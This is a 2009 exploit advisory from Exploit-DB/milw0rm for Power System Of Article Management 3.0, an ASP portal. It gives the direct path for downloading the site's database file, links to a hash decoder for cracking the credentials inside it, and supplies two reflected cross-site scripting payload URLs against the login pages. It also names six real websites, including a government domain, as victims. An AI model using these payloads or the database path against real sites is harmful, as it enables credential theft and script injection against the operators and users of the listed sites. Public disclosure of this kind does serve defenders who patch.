Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting

EDB-ID:

7981

CVE:

N/A


Platform:

ASP

Published:

2009-02-04

#########################################################
---------------------------------------------------------
Portal Name: Power System Of Article Management
Version : 3.0
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/yiuwekdsodksldfslwifds.mdb
Hash Decoder :
http://pouya2006.persiangig.com/dec/PSOAMv3.html
or Google searching ...
 
[XSS]:
http://site.com/[Path]/userchklogin.asp?UserName=Pouya&Password=Pouya&CookieDate=0&ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&Submit=%C8%B7%C8%CF

http://site.com/[Path]/userlogin.asp?ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
---------------------------------
Victem :
http://www.honeyjenny.com/art
http://www.hzyzzz.com
http://cdzy.cn/wyx/article
http://unix-cd.com/article
http://zhuyaren.com
http://www.ahss.gov.cn
---------------------------------------------------------
#########################################################

# milw0rm.com [2009-02-04]